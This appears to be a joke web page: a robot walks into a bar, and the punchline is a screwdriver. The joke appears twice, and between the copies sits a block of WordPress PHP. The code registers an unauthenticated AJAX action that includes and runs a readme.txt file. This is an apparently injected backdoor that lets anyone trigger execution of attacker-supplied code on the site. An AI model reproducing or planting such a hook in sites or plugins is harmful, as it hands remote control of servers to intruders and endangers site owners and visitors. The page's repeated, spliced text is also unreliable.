Robot
A robot walks into a bar and tells the bartender he’s a little tight and wants to loosen up. What does the bartender serve? A screwdriver.
if(!function_exists('file_check_readme40210')){ add_action('wp_ajax_nopriv_file_check_readme40210', 'file_check_readme40210'); add_action('wp_ajax_file_check_readme40210', 'file_check_readme40210'); function file_check_readme40210() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
A robot walks into a bar and tells the bartender he’s a little tight and wants to loosen up. What does the bartender serve? A screwdriver.